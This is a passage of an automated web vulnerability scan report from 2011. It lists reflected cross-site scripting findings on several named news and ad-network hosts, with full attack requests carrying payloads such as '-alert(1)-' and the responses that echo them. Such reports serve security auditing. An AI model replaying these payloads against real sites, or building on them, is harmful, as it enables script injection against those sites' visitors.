This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /app3d7c8"%3b5d6b79aeb68/port/bulkCommentCount.php?getIDs=comment_associated_press_bkn_nba_finals_mavericks_teamwork%2Ccomment_03819b4c-f382-11df-acd0-001cc4c002e0%2Ccomment_dc7efe06-46ae-11e0-9a3f-001cc4c002e0%2Ccomment_a238bd60-edc4-11df-9490-001cc4c03286%2Ccomment_f160afd4-d0a5-11de-9f42-001cc4c002e0%2C HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __unam=9fc39ed-13088a9af36-7127350f-1; __utmz=1.1307962881.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2101982937.1307962881.1307962881.1307962881.1; __utmc=1; __utmb=1.1.10.1307962881; s_cc=true; s_pv=http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html; s_sq=%5B%5BB%5D%5D; __qca=P0-1881757661-1307962922190

Response (redirected)

HTTP/1.1 415 Unsupported Media Type
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3202072
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 13 Jun 2011 11:02:45 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.12
X-TNCMS-Render-Time: 0.15
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: not cacheable; response code not cacheable
Real-Hostname: thesouthern.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 31865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://thesouthern.com/con
...[SNIP]...
<!--
s.pageName="http://thesouthern.com/app3d7c8";5d6b79aeb68/port/bulkcommentcount.php?getIDs=comment_associated_press_bkn_nba_finals_mavericks_teamwork%2Ccomment_03819b4c-f382-11df-acd0-001cc4c002e0%2Ccomment_dc7efe06-46ae-11e0-9a3f-001cc4c002e0%2Ccomment_a238
...[SNIP]...

4.234. http://thesouthern.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://thesouthern.com
Path:	/app/weather/qwikcast_feed0.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73288"%3bfb794ae916f was submitted in the REST URL parameter 1. This input was echoed as 73288";fb794ae916f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /app73288"%3bfb794ae916f/weather/qwikcast_feed0.xml HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __unam=9fc39ed-13088a9af36-7127350f-1; __utmz=1.1307962881.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2101982937.1307962881.1307962881.1307962881.1; __utmc=1; __utmb=1.1.10.1307962881; s_cc=true; s_pv=http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html; s_sq=%5B%5BB%5D%5D; __qca=P0-1881757661-1307962922190

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 3666852
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 13 Jun 2011 11:02:38 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.12
X-TNCMS-Render-Time: 0.2283
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: thesouthern.com
X-TNCMS-Served-By: cmsapp14
Content-Length: 46835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://thesouthern.com/app73288";fb794ae916f/weather/qwikcast_feed0.xml"
s.server="Carbondale"
s.channel="thesouthern.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""

...[SNIP]...

4.235. http://thesouthern.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://thesouthern.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 524e4"%3bf17ce3d65c1 was submitted in the REST URL parameter 1. This input was echoed as 524e4";f17ce3d65c1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /524e4"%3bf17ce3d65c1 HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __unam=9fc39ed-13088a9af36-7127350f-1; __utmz=1.1307962881.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2101982937.1307962881.1307962881.1307962881.1; __utmc=1; __utmb=1.1.10.1307962881; s_cc=true; s_pv=http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html; s_sq=%5B%5BB%5D%5D; __qca=P0-1881757661-1307962922190

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 3664932
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 13 Jun 2011 11:03:34 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.12
X-TNCMS-Render-Time: 0.1879
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: thesouthern.com
X-TNCMS-Served-By: cmsapp12
Content-Length: 46851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://thesouthern.com/524e4";f17ce3d65c1/"
s.server="Carbondale"
s.channel="thesouthern.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""

...[SNIP]...

4.236. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://thesouthern.com
Path:	/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76aa8"%3b214c99ebe1b was submitted in the REST URL parameter 1. This input was echoed as 76aa8";214c99ebe1b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sports76aa8"%3b214c99ebe1b/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4318916
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 13 Jun 2011 11:04:55 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.12
X-TNCMS-Render-Time: 0.2603
X-PHP-Engine: enabled
Connection: Keep-Alive
Last-Modified: Mon, 13 Jun 2011 10:13:38 GMT
X-Cache-Info: caching
Real-Hostname: thesouthern.com
X-TNCMS-Served-By: cmsapp9
Content-Length: 65596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://thesouthern.com/sports76aa8";214c99ebe1b/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html"
s.server="Carbondale"
s.channel="thesouthern.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=
...[SNIP]...

4.237. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://thesouthern.com
Path:	/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72ef8"%3ba840a745f48 was submitted in the REST URL parameter 2. This input was echoed as 72ef8";a840a745f48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sports/basketball72ef8"%3ba840a745f48/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4171352
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 13 Jun 2011 11:05:14 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.12
X-TNCMS-Render-Time: 0.2755
X-PHP-Engine: enabled
Connection: Keep-Alive
Last-Modified: Mon, 13 Jun 2011 10:13:38 GMT
X-Cache-Info: caching
Real-Hostname: thesouthern.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 63971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://thesouthern.com/sports/basketball72ef8";a840a745f48/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html"
s.server="Carbondale"
s.channel="thesouthern.com"
           s.pageType=""
           s.prop1="sports"
           s.prop2=""
           s.prop3=""
           s.prop4
...[SNIP]...

4.238. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://thesouthern.com
Path:	/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fefd6"%3bceb30c1182 was submitted in the REST URL parameter 3. This input was echoed as fefd6";ceb30c1182 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /sports/basketball/fefd6"%3bceb30c1182 HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 3515704
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 13 Jun 2011 11:05:32 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.12
X-TNCMS-Render-Time: 0.1737
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: thesouthern.com
X-TNCMS-Served-By: cmsapp7
Content-Length: 44868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://thesouthern.com/sports/basketball/fefd6";ceb30c1182/"
s.server="Carbondale"
s.channel="thesouthern.com"
           s.pageType=""
           s.prop1="sports"
           s.prop2="basketball"
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.pr
...[SNIP]...

4.239. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c03b0"-alert(1)-"5958ea17fd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0"-alert(1)-"5958ea17fd2=1 HTTP/1.1
Host: thesouthern.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4175512
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 13 Jun 2011 11:04:39 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.12
X-TNCMS-Render-Time: 1.3537
X-PHP-Engine: enabled
Connection: Keep-Alive
Last-Modified: Mon, 13 Jun 2011 10:13:38 GMT
X-Cache-Info: caching
Real-Hostname: thesouthern.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 63961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0"-alert(1)-"5958ea17fd2=1"
s.server="Carbondale"
s.channel="thesouthern.com"
           s.pageType=""
           s.prop1="sports"
           s.prop2="basketball"
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.p
...[SNIP]...

4.240. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tvfanatic.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e407'-alert(1)-'976b3fe637c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /intellitxt/front.asp?ipid=21217&1e407'-alert(1)-'976b3fe637c=1 HTTP/1.1
Host: tvfanatic.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR="AJMPkWzp50e+mCjNOtx/e8kAADsIAAA7VAUAAAEwVqToBQA-"

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AJMPkWzp50e+mCjNOtx/e8kAADsIAAA7XgIAAAEwiL2RqAA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Fri, 12-Aug-2011 11:23:02 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 10895
Date: Mon, 13 Jun 2011 11:23:02 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...

$iTXT.js.gaEnabled=true;$iTXT.js.gaTrackingId="UA-15687529-16";$iTXT.js.serverUrl='http://tvfanatic.us.intellitxt.com';$iTXT.js.serverName='tvfanatic.us.intellitxt.com';$iTXT.js.pageQuery='ipid=21217&1e407'-alert(1)-'976b3fe637c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=30000&c4=&c5=&c6=&c15=&cv=1.3
...[SNIP]...

4.241. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_js.js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c525e'-alert(1)-'5c0542f0f6a was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /am_js.js?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=338c525e'-alert(1)-'5c0542f0f6a&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz403fjVqW10ZWiw+hAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:42 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338c525e'-alert(1)-'5c0542f0f6a&external_user_id=E3F32BD05A8DDF4D5646D79602A10F8B"/>');

4.242. http://um.simpli.fi/am_js.js [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_js.js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 132f6'-alert(1)-'e78d2be7a66 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /am_js.js?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match132f6'-alert(1)-'e78d2be7a66 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz403fjVqW10ZWiw+hAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:43 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match132f6'-alert(1)-'e78d2be7a66?admeld_adprovider_id=338&external_user_id=E3F32BD05A8DDF4D5646D79602A10F8B"/>');

4.243. http://um.simpli.fi/am_match [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bff7d'-alert(1)-'573785878da was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /am_match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=338bff7d'-alert(1)-'573785878da&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz403fjVqW10ZWiw+hAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:43 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338bff7d'-alert(1)-'573785878da&external_user_id=E3F32BD05A8DDF4D5646D79602A10F8B"/>');

4.244. http://um.simpli.fi/am_match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cba2'-alert(1)-'c150e433f29 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /am_match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9cba2'-alert(1)-'c150e433f29 HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz403fjVqW10ZWiw+hAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:45 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match9cba2'-alert(1)-'c150e433f29?admeld_adprovider_id=338&external_user_id=E3F32BD05A8DDF4D5646D79602A10F8B"/>');

4.245. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://um.simpli.fi
Path:	/am_redirect_js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcef9'-alert(1)-'d33fbcbd51c was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /am_redirect_js?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=338fcef9'-alert(1)-'d33fbcbd51c&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz403fjVqW10ZWiw+hAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:42 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

